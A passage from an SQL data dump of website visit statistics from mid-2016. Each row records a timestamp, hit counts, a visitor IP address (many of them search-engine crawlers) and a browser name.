,'130.180.210.238','chrome'),(45317,1466685336,1,1,0,0,'91.124.183.179','firefox'),(45318,1466685357,1,1,0,0,'91.196.178.134','chrome'),(45319,1466685570,1,1,0,0,'91.196.176.13','chrome'),(45320,1466685600,1,1,0,0,'91.196.178.71','firefox'),(45321,1466686889,1,1,0,0,'37.52.20.134','firefox'),(45322,1466688221,1,1,0,0,'66.249.78.136','chrome'),(45323,1466688860,1,1,0,0,'91.196.178.100','opera'),(45324,1466688892,1,1,0,0,'130.193.50.34','other'),(45325,1466689215,1,1,0,0,'82.207.115.142','firefox'),(45326,1466689992,1,1,0,0,'176.101.221.227','chrome'),(45327,1466690467,1,1,0,0,'91.196.178.101','chrome'),(45328,1466690562,1,1,0,0,'95.134.176.197','chrome'),(45329,1466690911,1,0,1,0,'66.249.78.164',''),(45330,1466691065,1,1,0,0,'91.124.183.179','firefox'),(45331,1466691447,1,0,1,0,'66.249.78.171',''),(45332,1466691571,1,1,0,0,'66.249.78.150','chrome'),(45333,1466692970,1,1,0,0,'94.178.76.52','chrome'),(45334,1466693268,1,0,1,0,'66.249.78.143',''),(45335,1466694158,1,1,0,0,'91.196.178.133','chrome'),(45336,1466694625,1,1,0,0,'91.196.178.101','chrome'),(45337,1466695439,1,1,0,0,'107.21.1.8','other'),(45338,1466695616,1,1,0,0,'78.111.189.187','chrome'),(45339,1466697454,1,1,0,0,'66.249.78.150','chrome'),(45340,1466697684,1,1,0,0,'92.113.156.25','chrome'),(45341,1466697769,1,0,1,0,'66.249.75.207',''),(45342,1466698391,1,0,1,0,'66.249.78.164',''),(45343,1466698658,1,0,1,0,'68.180.231.49',''),(45344,1466699864,1,1,0,0,'91.124.2.50','chrome'),(45345,1466699894,1,1,0,0,'130.193.51.19','other'),(45346,1466700371,1,1,0,0,'94.179.15.19','firefox'),(45347,1466701918,1,0,1,0,'66.249.66.188',''),(45348,1466702106,1,1,0,0,'37.73.210.212','chrome'),(45349,1466703202,1,1,0,0,'91.196.178.66','firefox'),(45350,1466705324,1,1,0,0,'91.196.178.37','chrome'),(45351,1466705668,1,1,0,0,'180.76.15.14','other'),(45352,1466705825,1,1,0,0,'151.80.31.103','other'),(45353,1466707359,1,1,0,0,'91.196.178.133','chrome'),(45354,1466707896,1,1,0,0,'94.179.119.177','firefox'),(45355,1466707992,1,1,0,0,'157.55.39.166','other'),(45356,1466708214,1,1,0,0,'91.124.183.179','firefox'),(45357,1466710311,1,1,0,0,'207.46.13.91','other'),(45358,1466710780,1,0,1,0,'66.249.78.164',''),(45359,1466711534,1,1,0,0,'164.132.161.26','other'),(45360,1466711639,1,1,0,0,'130.180.217.45','chrome'),(45361,1466711990,1,1,0,0,'66.249.78.136','chrome'),(45362,1466712051,2,2,0,0,'66.249.78.164','chrome'),(45363,1466714730,1,1,0,0,'66.249.78.150','chrome'),(45364,1466715067,1,1,0,0,'81.109.65.38','other'),(45365,1466715319,1,1,0,0,'193.194.127.217','firefox'),(45366,1466715781,1,1,0,0,'164.132.161.25','other'),(45367,1466716691,1,1,0,0,'66.249.78.143','chrome'),(45368,1466716708,1,1,0,0,'66.249.78.171','chrome'),(45369,1466717060,1,1,0,0,'130.193.50.34','other'),(45370,1466719540,1,1,0,0,'66.249.66.180','chrome'),(45371,1466719903,1,1,0,0,'51.255.65.2','other'),(45372,1466722845,2,2,0,0,'66.249.78.164','chrome'),(45373,1466723210,1,1,0,0,'157.55.39.166','other'),(45374,1466723269,1,0,1,0,'66.249.78.136',''),(45375,1466726216,1,1,0,0,'207.46.13.159','other'),(45376,1466726226,2,2,0,0,'130.193.50.34','other'),(45377,1466727718,1,1,0,0,'130.193.51.19','other'),(45378,1466728797,1,1,0,0,'130.193.50.34','other'),(45379,1466731130,1,0,1,0,'66.249.78.150',''),(45380,1466731301,1,1,0,0,'141.8.142.58','other'),(45381,1466733215,1,1,0,0,'91.121.112.142','other'),(45382,1466735018,1,1,0,0,'141.8.142.61','other'),(45383,1466735241,1,1,0,0,'66.249.78.178','chrome'),(45384,1466736403,1,0,1,0,'66.249.78.143',''),(45385,1466739523,1,1,0,0,'207.46.13.91','other'),(45386,1466742312,1,1,0,0,'178.24.113.152','other'),(45387,1466742902,1,1,0,0,'141.8.142.61','other'),(45388,1466746874,1,0,1,0,'66.249.78.164',''),(45389,1466747165,1,1,0,0,'66.249.93.187','chrome'),(45390,1466747405,1,1,0,0,'94.179.164.31','chrome'),(45391,1466748741,4,4,0,0,'69.30.205.218','other'),(45392,1466748777,1,0,1,0,'66.249.66.188',''),(45393,1466750980,1,1,0,0,'37.52.16.140','msie'),(45394,1466751425,2,0,2,0,'66.249.78.171',''),(45395,1466751788,1,1,0,0,'164.132.161.58','other'),(45396,1466752160,2,2,0,0,'141.8.142.58','other'),(45397,1466752241,1,1,0,0,'164.132.161.6','other'),(45398,1466752269,1,1,0,0,'37.55.180.165','chrome'),(45399,1466752569,1,1,0,0,'130.193.50.34','other'),(45400,1466752802,1,1,0,0,'157.55.39.166','other'),(45401,1466752858,1,1,0,0,'130.193.51.19','other'),(45402,1466754875,1,1,0,0,'91.196.178.66','firefox'),(45403,1466756135,1,1,0,0,'91.196.178.67','firefox'),(45404,1466757286,1,0,1,0,'68.180.231.49',''),(45405,1466758504,1,1,0,0,'207.46.13.91','other'),(45406,1466758763,1,1,0,0,'5.58.128.166','chrome'),(45407,1466759485,1,1,0,0,'91.196.178.98','chrome'),(45408,1466760006,2,2,0,0,'91.196.178.72','chrome'),(45409,1466761336,1,1,0,0,'95.133.197.45','chrome'),(45410,1466761370,1,1,0,0,'212.90.188.114','chrome'),(45411,1466763506,2,2,0,0,'91.196.178.163','chrome'),(45412,1466765259,2,2,0,0,'5.58.128.166','firefox'),(45413,1466766026,1,1,0,0,'157.55.39.166','other'),(45414,1466767023,1,1,0,0,'46.211.7.113','chrome'),(45415,1466767128,1,1,0,0,'91.196.178.66','firefox'),(45416,1466767169,1,1,0,0,'54.244.48.20','msie'),(45417,1466768762,1,1,0,0,'176.32.0.10','firefox'),(45418,1466768840,1,1,0,0,'130.193.51.19','other'),(45419,1466769489,1,1,0,0,'66.249.78.136','chrome'),(45420,1466770771,1,1,0,0,'91.196.178.68','firefox'),(45421,1466771699,1,0,1,0,'66.249.78.136',''),(45422,1466772020,1,1,0,0,'164.132.161.45','other'),(45423,1466772789,1,1,0,0,'66.249.78.178','chrome'),(45424,1466775072,1,1,0,0,'78.111.189.179','chrome'),(45425,1466775341,1,1,0,0,'66.249.78.164','chrome'),(45426,1466775357,1,1,0,0,'51.255.65.62','other'),(45427,1466777435,1,1,0,0,'78.111.189.179','chrome'),(45428,1466780218,1,1,0,0,'157.55.39.166','other'),(45429,1466781073,1,1,0,0,'141.8.183.25','other'),(45430,1466783845,1,1,0,0,'157.55.39.166','other'),(45431,1466785619,1,0,1,0,'66.249.66.177',''),(45432,1466786503,1,0,1,0,'66.249.78.164',''),(45433,1466787512,1,1,0,0,'141.8.183.25','other'),(45434,1466789397,1,1,0,0,'130.193.51.19','other'),(45435,1466789569,1,0,1,0,'66.249.78.178',''),(45436,1466791299,1,0,1,0,'66.249.66.180',''),(45437,1466791756,1,1,0,0,'141.8.183.25','other'),(45438,1466792020,1,1,0,0,'141.8.142.25','other'),(45439,1466792154,1,1,0,0,'91.124.183.179','firefox'),(45440,1466792514,1,0,1,0,'66.249.75.207',''),(45441,1466794726,1,1,0,0,'66.249.78.164','chrome'),(45442,1466796761,1,1,0,0,'193.194.127.217','firefox'),(45443,1466796846,1,0,1,0,'66.249.78.143',''),(45444,1466798384,1,1,0,0,'91.196.178.164','firefox'),(45445,1466799810,1,1,0,0,'180.76.15.150','other'),(45446,1466804232,1,1,0,0,'66.249.78.171','chrome'),(45447,1466805780,1,1,0,0,'40.77.167.14','other'),(45448,1466806752,1,1,0,0,'157.55.39.166','other'),(45449,1466811726,1,0,1,0,'66.249.78.150',''),(45450,1466813537,1,1,0,0,'130.193.51.19','other'),(45451,1466814018,1,1,0,0,'66.249.75.247','chrome'),(45452,1466815241,1,0,1,0,'66.249.78.164',''),(45453,1466816093,1,1,0,0,'51.255.65.37','other'),(45454,1466816913,2,2,0,0,'141.8.183.25','other'),(45455,1466817250,1,0,1,0,'66.249.78.143',''),(45456,1466817267,1,1,0,0,'130.193.50.34','other'),(45457,1466818242,1,0,1,0,'66.249.78.171',''),(45458,1466819191,1,1,0,0,'66.249.78.164','chrome'),(45459,1466819823,1,1,0,0,'66.249.66.185','chrome'),(45460,1466822265,2,2,0,0,'66.249.78.178','chrome'),(45461,1466822525,1,1,0,0,'66.249.78.171','chrome'),(45462,1466822728,1,1,0,0,'66.249.66.180','chrome'),(45463,1466823884,1,0,1,0,'66.249.66.182',''),(45464,1466824356,1,1,0,0,'66.249.78.143','chrome'),(45465,1466825355,2,0,2,0,'66.249.78.164',''),(45466,1466825522,1,1,0,0,'66.249.78.164','chrome'),(45467,1466827767,1,1,0,0,'141.8.183.25','other'),(45468,1466827826,1,1,0,0,'151.80.31.105','other'),(45469,1466832963,1,0,1,0,'66.249.78.164',''),(45470,1466832980,1,1,0,0,'91.196.178.161','other'),(45471,1466834203,1,0,1,0,'66.249.78.164',''),(45472,1466835258,1,1,0,0,'141.8.183.25','other'),(45473,1466835663,1,0,1,0,'66.249.78.136',''),(45474,1466836100,1,1,0,0,'37.55.155.184','chrome'),(45475,1466836196,1,1,0,0,'95.221.194.34','chrome'),(45476,1466836198,1,1,0,0,'178.140.233.170','chrome'),(45478,1466836332,1,1,0,0,'180.76.15.159','other'),(45479,1466836551,1,1,0,0,'69.30.234.186','other'),(45480,1466837329,2,2,0,0,'141.8.142.67','other'),(45481,1466837333,1,1,0,0,'141.8.142.61','other'),(45482,1466837418,1,1,0,0,'188.32.74.45','msie'),(45483,1466837422,1,1,0,0,'5.228.81.112','msie'),(45484,1466837435,1,1,0,0,'46.147.98.138','msie'),(45485,1466838492,2,2,0,0,'130.193.50.34','other'),(45486,1466839623,1,1,0,0,'66.249.93.147','chrome'),(45487,1466841832,15,15,0,0,'69.30.198.178','other'),(45488,1466841930,1,1,0,0,'207.46.13.136','other'),(45489,1466843408,1,1,0,0,'91.196.178.133','firefox'),(45490,1466845952,1,1,0,0,'141.8.183.25','other'),(45491,1466848799,1,0,1,0,'66.249.78.136',''),(45492,1466849421,1,0,1,0,'66.249.78.178',''),(45493,1466851464,1,1,0,0,'207.46.13.136','other'),(45494,1466852113,1,0,1,0,'66.249.78.164',''),(45495,1466853881,1,1,0,0,'91.196.178.35','firefox'),(45496,1466854639,1,1,0,0,'40.77.167.78','other'),(45497,1466855539,1,0,1,0,'66.249.78.171',''),(45498,1466855572,77,77,0,0,'91.198.143.116','other'),(45499,1466856503,175,175,0,0,'91.198.143.116','other'),(45500,1466857031,1,1,0,0,'178.95.12.96','chrome'),(45501,1466857405,1,1,0,0,'91.198.143.116','other'),(45502,1466858273,1,1,0,0,'188.163.79.79','chrome'),(45503,1466858519,1,1,0,0,'180.76.15.139','other'),(45504,1466859860,1,0,1,0,'66.249.78.178',''),(45505,1466859966,1,1,0,0,'91.124.183.179','firefox'),(45506,1466860601,1,1,0,0,'130.193.50.34','other'),(45507,1466860785,1,1,0,0,'151.80.31.107','other'),(45508,1466860789,1,1,0,0,'40.77.167.78','other'),(45509,1466860902,1,1,0,0,'141.8.183.25','other'),(45510,1466861014,1,0,1,0,'66.249.78.171',''),(45511,1466861197,3,3,0,0,'78.168.78.39','other'),(45512,1466862489,1,1,0,0,'66.249.78.171','chrome'),(45513,1466863362,1,1,0,0,'40.77.167.78','other'),(45514,1466863659,1,0,1,0,'66.249.78.171',''),(45515,1466864242,1,0,1,0,'66.249.78.143',''),(45516,1466864662,4,4,0,0,'5.9.62.130','other'),(45517,1466865166,1,0,1,0,'66.249.64.149',''),(45518,1466866707,1,0,1,0,'66.249.64.180',''),(45519,1466867483,1,1,0,0,'157.55.39.13','other'),(45520,1466868877,1,1,0,0,'207.46.13.136','other'),(45521,1466871160,1,1,0,0,'130.193.51.19','other'),(45522,1466871273,1,1,0,0,'51.255.65.27','other'),(45523,1466871333,1,1,0,0,'130.193.50.34','other'),(45524,1466871470,1,0,1,0,'66.249.64.249',''),(45525,1466871720,1,0,1,0,'66.249.75.239',''),(45526,1466872165,1,1,0,0,'176.37.240.12','chrome'),(45527,1466872636,2,2,0,0,'130.193.50.34','other'),(45528,1466873001,1,1,0,0,'151.80.31.103','other'),(45529,1466874669,1,0,1,0,'66.249.64.249',''),(45530,1466875649,1,1,0,0,'130.193.51.19','other'),(45531,1466875790,1,1,0,0,'130.193.50.34','other'),(45532,1466877353,114,114,0,0,'195.154.185.20','other'),(45533,1466878958,1,1,0,0,'207.46.13.136','other'),(45534,1466880340,1,1,0,0,'66.249.64.170','chrome'),(45535,1466881755,1,1,0,0,'91.124.183.179','firefox'),(45536,1466882849,1,0,1,0,'66.249.64.180',''),(45537,1466883674,1,1,0,0,'164.132.161.76','other'),(45538,1466884851,1,1,0,0,'91.124.183.179','firefox'),(45539,1466886083,1,0,1,0,'66.249.64.239',''),(45540,1466887670,1,1,0,0,'157.55.39.13','other'),(45541,1466888014,1,1,0,0,'51.255.65.31','other'),(45542,1466888236,1,1,0,0,'66.249.64.170','chrome'),(45543,1466888853,1,0,1,0,'66.249.75.199',''),(45544,1466889315,1,0,1,0,'66.249.64.244',''),(45545,1466891069,1,0,1,0,'66.249.64.170',''),(45546,1466891896,4,4,0,0,'141.8.142.58','other'),(45547,1466891951,1,1,0,0,'93.158.152.84','other'),(45548,1466892034,2,2,0,0,'130.193.51.19','other'),(45549,1466892115,1,1,0,0,'141.8.183.25','other'),(45550,1466892193,2,2,0,0,'141.8.142.61','other'),(45551,1466892968,1,1,0,0,'93.73.55.74','chrome'),(45552,1466894230,1,1,0,0,'93.158.152.84','other'),(45553,1466894234,1,1,0,0,'130.193.51.43','other'),(45554,1466894309,1,1,0,0,'141.8.142.61','other'),(45555,1466894496,1,1,0,0,'93.158.152.9','other'),(45556,1466894590,1,1,0,0,'93.158.152.26','other'),(45557,1466894678,1,1,0,0,'5.255.253.67','other'),(45558,1466894701,1,0,1,0,'66.249.64.244',''),(45559,1466898013,1,1,0,0,'93.158.152.51','other'),(45560,1466898015,1,1,0,0,'141.8.132.10','other'),(45561,1466898306,1,1,0,0,'207.46.13.136','other'),(45562,1466898347,1,1,0,0,'130.193.37.21','other'),(45563,1466898427,1,1,0,0,'178.154.189.37','other'),(45564,1466899883,1,1,0,0,'66.249.64.180','chrome'),(45565,1466900036,1,1,0,0,'66.249.64.244','chrome'),(45566,1466900753,1,1,0,0,'130.193.51.19','other'),(45567,1466900819,2,2,0,0,'130.193.50.34','other'),(45568,1466900887,1,1,0,0,'93.158.152.84','other'),(45569,1466900972,1,1,0,0,'141.8.183.25','other'),(45570,1466901340,1,1,0,0,'51.255.65.18','other'),(45571,1466904158,1,1,0,0,'207.46.13.39','other'),(45572,1466904374,1,1,0,0,'130.193.50.6','other'),(45573,1466905577,1,1,0,0,'141.8.142.67','other'),(45574,1466905723,1,0,1,0,'66.249.64.249',''),(45575,1466905788,2,0,2,0,'66.249.64.239',''),(45576,1466905960,1,1,0,0,'151.80.31.170','other'),(45577,1466906704,1,1,0,0,'164.132.161.15','other'),(45578,1466906981,1,1,0,0,'130.193.51.19','other'),(45579,1466907071,1,1,0,0,'130.193.50.34','other'),(45580,1466907123,1,1,0,0,'141.8.183.19','other'),(45581,1466907129,1,1,0,0,'93.158.152.84','other'),(45582,1466907174,1,1,0,0,'141.8.142.61','other'),(45583,1466909677,1,1,0,0,'141.0.15.130','other'),(45584,1466910452,1,1,0,0,'130.193.51.19','other'),(45585,1466910580,1,1,0,0,'164.132.161.24','other'),(45586,1466910889,2,2,0,0,'130.193.50.34','other'),(45587,1466910969,1,1,0,0,'141.8.142.61','other'),(45588,1466911012,1,1,0,0,'141.8.183.25','other'),(45589,1466915367,1,1,0,0,'130.193.50.34','other'),(45590,1466917330,1,0,1,0,'66.249.64.175',''),(45591,1466917408,1,1,0,0,'141.8.183.25','other'),(45592,1466918989,1,1,0,0,'207.46.13.136','other'),(45593,1466920517,1,0,1,0,'66.249.64.175',''),(45594,1466922665,1,0,1,0,'66.249.64.175',''),(45595,1466926722,1,1,0,0,'164.132.161.51','other'),(45596,1466927847,1,1,0,0,'78.111.189.142','chrome'),(45597,1466928153,1,1,0,0,'207.46.13.136','other'),(45598,1466928777,1,0,1,0,'66.249.64.244',''),(45599,1466929300,1,1,0,0,'180.76.15.31','other'),(45600,1466930587,1,1,0,0,'130.193.51.19','other'),(45601,1466930643,1,1,0,0,'130.193.50.34','other'),(45602,1466930771,1,1,0,0,'141.8.142.58','other'),(45603,1466932417,1,1,0,0,'130.193.50.34','other'),(45604,1466932992,1,1,0,0,'78.111.189.167','chrome'),(45605,1466933554,2,2,0,0,'157.55.39.13','other'),(45606,1466934035,1,1,0,0,'141.8.183.25','other'),(45607,1466936959,1,1,0,0,'91.196.178.135','firefox'),(45608,1466938113,1,1,0,0,'51.255.65.42','other'),(45609,1466939715,1,0,1,0,'66.249.64.175',''),(45610,1466939846,1,0,1,0,'66.249.64.239',''),(45611,1466939890,1,1,0,0,'207.46.13.136','other'),(45612,1466940888,1,1,0,0,'130.193.50.34','other'),(45613,1466941067,2,2,0,0,'141.8.183.25','other'),(45614,1466941106,1,1,0,0,'66.249.64.239','chrome'),(45615,1466942359,1,1,0,0,'180.76.15.14','other'),(45616,1466943099,1,1,0,0,'66.249.93.153','chrome'),(45617,1466943764,1,1,0,0,'130.193.50.34','other'),(45618,1466943886,1,1,0,0,'66.249.64.175','chrome'),(45619,1466944320,1,1,0,0,'178.95.246.73','chrome'),(45620,1466947327,1,1,0,0,'130.193.50.34','other'),(45621,1466948190,1,1,0,0,'176.102.206.204','chrome'),(45622,1466949759,1,1,0,0,'91.196.178.35','firefox'),(45623,1466949912,1,1,0,0,'176.102.206.204','chrome'),(45624,1466950526,1,0,1,0,'66.249.64.239',''),(45625,1466950598,1,1,0,0,'130.193.51.19','other'),(45626,1466950681,1,1,0,0,'141.8.142.58','other'),(45627,1466951797,21,21,0,0,'178.24.113.152','other'),(45628,1466952570,1,1,0,0,'91.121.157.80','other'),(45629,1466955295,1,1,0,0,'141.8.183.25','other'),(45630,1466955323,1,1,0,0,'141.8.142.58','other'),(45631,1466955416,4,4,0,0,'69.30.203.166','other'),(45632,1466958538,1,0,1,0,'66.249.78.178',''),(45633,1466958975,1,1,0,0,'130.193.50.34','other'),(45634,1466962749,1,1,0,0,'207.46.13.136','other'),(45635,1466963248,1,0,1,0,'66.249.78.136',''),(45636,1466963953,1,0,1,0,'66.249.78.178',''),(45637,1466964007,1,1,0,0,'141.8.183.25','other'),(45638,1466969877,1,1,0,0,'207.46.13.136','other'),(45639,1466970373,1,1,0,0,'93.158.152.61','other'),(45640,1466970376,1,1,0,0,'130.193.51.14','other'),(45641,1466970377,1,1,0,0,'5.255.253.9','other'),(45642,1466970380,1,1,0,0,'141.8.142.10','other'),(45643,1466971484,1,0,1,0,'66.249.78.143',''),(45644,1466972060,1,0,1,0,'66.249.78.150',''),(45645,1466972347,1,1,0,0,'130.193.51.74','other'),(45646,1466972427,3,3,0,0,'130.193.50.34','other'),(45647,1466972467,1,1,0,0,'141.8.142.67','other'),(45648,1466972513,1,1,0,0,'141.8.183.25','other'),(45649,1466972633,1,1,0,0,'69.30.201.98','other'),(45650,1466973265,1,1,0,0,'193.194.127.217','firefox'),(45651,1466975261,2,2,0,0,'130.193.50.34','other'),(45652,1466977687,1,0,1,0,'66.249.78.136',''),(45653,1466977741,1,1,0,0,'207.46.13.136','other'),(45654,1466978984,1,0,1,0,'66.249.78.178',''),(45655,1466979172,1,1,0,0,'130.193.50.34','other'),(45656,1466979263,1,1,0,0,'141.8.142.58','other'),(45657,1466984051,1,1,0,0,'207.46.13.136','other'),(45658,1466988023,1,1,0,0,'130.193.50.34','other'),(45659,1466988443,1,0,1,0,'66.249.78.178',''),(45660,1466988547,1,0,1,0,'66.249.78.143',''),(45661,1466989483,1,1,0,0,'66.249.78.150','chrome'),(45662,1466989651,1,1,0,0,'66.249.66.183','chrome'),(45663,1466991296,1,1,0,0,'130.193.50.34','other'),(45664,1466991299,1,1,0,0,'130.193.51.79','other'),(45665,1466991339,1,1,0,0,'157.55.39.13','other'),(45666,1466998452,1,1,0,0,'208.115.113.82','other'),(45667,1466998551,1,0,1,0,'66.249.78.164',''),(45668,1466999640,1,0,1,0,'66.249.66.188',''),(45669,1467002548,1,1,0,0,'180.76.15.142','other'),(45670,1467005795,1,1,0,0,'207.46.13.39','other'),(45671,1467007386,1,1,0,0,'95.158.53.6','chrome'),(45672,1467007865,1,1,0,0,'69.30.221.250','other'),(45673,1467008426,1,1,0,0,'91.195.173.8','chrome'),(45674,1467008576,1,0,1,0,'66.249.66.183',''),(45675,1467011028,1,1,0,0,'91.124.183.179','firefox'),(45676,1467013145,1,1,0,0,'78.111.189.188','chrome'),(45677,1467014676,1,1,0,0,'91.196.178.71','firefox'),(45678,1467014719,1,1,0,0,'141.8.142.58','other'),(45679,1467015847,1,1,0,0,'141.8.142.61','other'),(45680,1467015972,1,1,0,0,'141.8.183.25','other'),(45681,1467016308,1,1,0,0,'193.254.196.58','firefox'),(45682,1467018343,1,0,1,0,'66.249.78.164',''),(45683,1467018769,1,1,0,0,'91.238.23.43','firefox'),(45684,1467020558,1,1,0,0,'130.193.51.19','other'),(45685,1467020975,1,1,0,0,'130.193.50.34','other'),(45686,1467020990,1,0,1,0,'66.249.78.136',''),(45687,1467022814,1,1,0,0,'130.193.51.19','other'),(45688,1467023962,1,1,0,0,'157.55.39.13','other'),(45689,1467024840,2,2,0,0,'207.46.13.39','other'),(45690,1467026223,1,1,0,0,'164.132.161.94','other'),(45691,1467027365,1,0,1,0,'66.249.66.180',''),(45692,1467027757,1,1,0,0,'93.158.152.84','other'),(45693,1467027879,1,1,0,0,'130.193.51.79','other'),(45694,1467027906,1,1,0,0,'141.8.142.67','other'),(45695,1467028004,1,1,0,0,'130.193.51.19','other'),(45696,1467028032,1,1,0,0,'141.8.183.25','other'),(45697,1467030194,1,1,0,0,'141.8.142.58','other'),(45698,1467030955,1,1,0,0,'130.193.51.19','other'),(45699,1467030956,1,1,0,0,'141.8.183.25','other'),(45700,1467032409,1,1,0,0,'51.255.65.27','other'),(45701,1467032418,1,1,0,0,'141.8.142.61','other'),(45702,1467032423,1,1,0,0,'130.193.50.34','other'),(45703,1467032826,1,1,0,0,'141.8.183.25','other'),(45704,1467034009,7,7,0,0,'89.163.148.58','other'),(45705,1467034192,1,1,0,0,'141.8.142.61','other'),(45706,1467034200,1,1,0,0,'93.158.152.84','other'),(45707,1467034301,1,1,0,0,'141.8.183.25','other'),(45708,1467034340,1,1,0,0,'141.8.142.67','other'),(45709,1467034495,2,2,0,0,'130.193.51.19','other'),(45710,1467034978,1,1,0,0,'91.124.239.35','chrome'),(45711,1467036526,1,1,0,0,'176.8.129.31','chrome'),(45712,1467038387,1,1,0,0,'130.193.51.19','other'),(45713,1467038427,1,1,0,0,'141.8.183.19','other'),(45714,1467038548,1,1,0,0,'141.8.142.67','other'),(45715,1467038721,1,1,0,0,'164.132.161.67','other'),(45716,1467039585,1,1,0,0,'207.46.13.136','other'),(45717,1467040361,1,0,1,0,'66.249.78.171',''),(45718,1467040964,143,143,0,0,'5.9.62.130','other'),(45719,1467041100,3,3,0,0,'130.193.50.34','other'),(45720,1467041251,2,2,0,0,'130.193.51.19','other'),(45721,1467041409,1,1,0,0,'141.8.183.25','other'),(45722,1467041423,1,1,0,0,'141.8.142.58','other'),(45723,1467042189,1,0,1,0,'66.249.78.164',''),(45724,1467042970,1,1,0,0,'93.80.9.104','chrome'),(45725,1467042972,1,1,0,0,'37.204.99.204','msie'),(45727,1467042973,1,1,0,0,'95.221.194.23','firefox'),(45728,1467043107,4,4,0,0,'209.126.127.49','other'),(45729,1467044770,2,2,0,0,'130.193.50.34','other'),(45730,1467044838,1,1,0,0,'141.8.142.61','other'),(45731,1467045087,2,2,0,0,'141.8.183.25','other'),(45732,1467045852,1,1,0,0,'130.193.50.34','other'),(45733,1467045994,1,1,0,0,'130.193.51.19','other'),(45734,1467046237,1,1,0,0,'141.8.183.25','other'),(45735,1467047028,2,2,0,0,'130.193.50.34','other'),(45736,1467048561,2,2,0,0,'130.193.50.34','other'),(45737,1467048562,1,1,0,0,'141.8.183.25','other'),(45738,1467048793,1,1,0,0,'178.92.8.188','chrome'),(45739,1467052105,1,1,0,0,'141.8.142.8','other'),(45740,1467052108,1,1,0,0,'5.255.253.68','other'),(45741,1467052506,2,2,0,0,'130.193.50.34','other'),(45742,1467052630,1,1,0,0,'193.194.127.217','firefox'),(45743,1467052727,1,1,0,0,'141.8.142.58','other'),(45744,1467054130,1,1,0,0,'164.132.161.28','other'),(45745,1467054244,1,0,1,0,'66.249.78.178',''),(45746,1467054847,1,1,0,0,'157.55.39.13','other'),(45747,1467055419,1,1,0,0,'91.124.182.91','firefox'),(45748,1467055605,2,2,0,0,'130.193.50.34','other'),(45749,1467055852,1,1,0,0,'141.8.183.25','other'),(45750,1467056691,1,0,1,0,'66.249.78.150',''),(45751,1467056774,1,0,1,0,'66.249.78.178',''),(45752,1467057517,1,0,1,0,'66.249.78.164',''),(45753,1467058883,2,2,0,0,'141.8.142.58','other'),(45754,1467059022,2,2,0,0,'130.193.50.34','other'),(45755,1467059042,2,2,0,0,'141.8.183.25','other'),(45756,1467059167,1,1,0,0,'130.193.51.19','other'),(45757,1467060637,1,1,0,0,'207.46.13.136','other'),(45758,1467060680,1,1,0,0,'93.73.55.74','chrome'),(45759,1467060952,3,3,0,0,'88.224.214.232','other'),(45760,1467062664,1,1,0,0,'157.55.39.13','other'),(45761,1467062751,3,3,0,0,'130.193.50.34','other'),(45762,1467063341,4,4,0,0,'69.30.213.18','other'),(45763,1467065152,2,0,2,0,'66.249.78.171',''),(45764,1467065304,1,1,0,0,'130.193.51.19','other'),(45765,1467065430,2,2,0,0,'141.8.183.25','other'),(45766,1467068372,1,0,1,0,'66.249.78.178',''),(45767,1467070432,2,2,0,0,'141.8.142.61','other'),(45768,1467070838,1,1,0,0,'130.193.50.34','other'),(45769,1467071385,1,0,1,0,'66.249.78.178',''),(45770,1467072053,1,0,1,0,'66.249.78.136',''),(45771,1467072338,1,0,1,0,'66.249.78.164',''),(45772,1467073194,1,0,1,0,'68.180.229.171',''),(45773,1467074825,3,3,0,0,'130.193.50.34','other'),(45774,1467075557,1,0,1,0,'68.180.229.171',''),(45775,1467077679,1,0,1,0,'66.249.75.191',''),(45776,1467077890,1,0,1,0,'66.249.78.164',''),(45777,1467078520,1,1,0,0,'93.158.152.40','other'),(45778,1467078748,1,1,0,0,'130.193.51.14','other'),(45779,1467078879,1,1,0,0,'141.8.142.25','other'),(45780,1467078882,1,1,0,0,'130.193.51.19','other'),(45781,1467078981,2,2,0,0,'141.8.132.30','other'),(45782,1467079029,1,1,0,0,'141.8.142.61','other'),(45783,1467079203,1,0,1,0,'66.249.78.171',''),(45784,1467079506,1,1,0,0,'178.154.149.10','other'),(45785,1467083330,5,5,0,0,'52.3.127.144','other'),(45786,1467084076,1,1,0,0,'180.76.15.18','other'),(45787,1467085198,1,1,0,0,'95.24.43.224','msie'),(45788,1467085199,1,1,0,0,'90.154.95.222','msie'),(45789,1467085200,1,1,0,0,'95.27.206.174','msie'),(45790,1467085202,1,1,0,0,'128.69.78.140','msie'),(45791,1467085394,1,1,0,0,'130.193.37.7','other'),(45792,1467085521,2,2,0,0,'130.193.51.19','other'),(45793,1467085645,1,1,0,0,'93.158.152.40','other'),(45794,1467085944,1,1,0,0,'141.8.183.19','other'),(45795,1467086070,2,2,0,0,'130.193.51.14','other'),(45796,1467086320,1,1,0,0,'141.8.132.10','other'),(45797,1467086716,1,1,0,0,'141.8.142.67','other'),(45798,1467088493,1,1,0,0,'141.8.142.58','other'),(45799,1467088749,2,2,0,0,'52.3.127.144','other'),(45800,1467089076,1,1,0,0,'46.164.131.86','chrome'),(45801,1467089114,1,1,0,0,'130.193.50.34','other'),(45802,1467089243,1,1,0,0,'141.8.183.25','other'),(45803,1467090198,1,1,0,0,'188.32.178.201','msie'),(45804,1467090250,2,2,0,0,'52.3.127.144','other'),(45805,1467090385,1,1,0,0,'207.46.13.136','other'),(45806,1467090692,1,1,0,0,'141.8.142.61','other'),(45807,1467090773,1,1,0,0,'128.68.14.110','chrome'),(45808,1467090845,1,1,0,0,'64.246.187.42','firefox'),(45809,1467090985,1,1,0,0,'78.106.226.97','firefox'),(45810,1467091026,1,1,0,0,'199.58.86.211','other'),(45811,1467091135,1,1,0,0,'130.193.51.19','other'),(45812,1467091146,1,1,0,0,'95.220.175.209','firefox'),(45813,1467091415,1,0,1,0,'66.249.78.171',''),(45814,1467092416,1,1,0,0,'130.193.50.34','other'),(45815,1467092822,1,1,0,0,'141.8.183.19','other'),(45816,1467093007,1,1,0,0,'5.255.253.67','other'),(45817,1467093126,1,0,1,0,'68.180.229.171',''),(45818,1467093810,1,1,0,0,'207.46.13.39','other'),(45819,1467093907,2,2,0,0,'130.193.50.34','other'),(45820,1467094484,1,1,0,0,'141.8.142.67','other'),(45821,1467094487,1,1,0,0,'141.8.132.10','other'),(45822,1467094598,1,1,0,0,'141.8.142.58','other'),(45823,1467095254,3,3,0,0,'52.3.127.144','other'),(45824,1467095755,1,0,1,0,'66.249.78.178',''),(45825,1467096105,1,1,0,0,'66.249.93.147','chrome'),(45826,1467096672,1,1,0,0,'130.193.50.34','other'),(45827,1467096815,2,2,0,0,'130.193.51.19','other'),(45828,1467097174,1,1,0,0,'141.8.142.58','other'),(45829,1467098267,1,1,0,0,'141.8.183.25','other'),(4583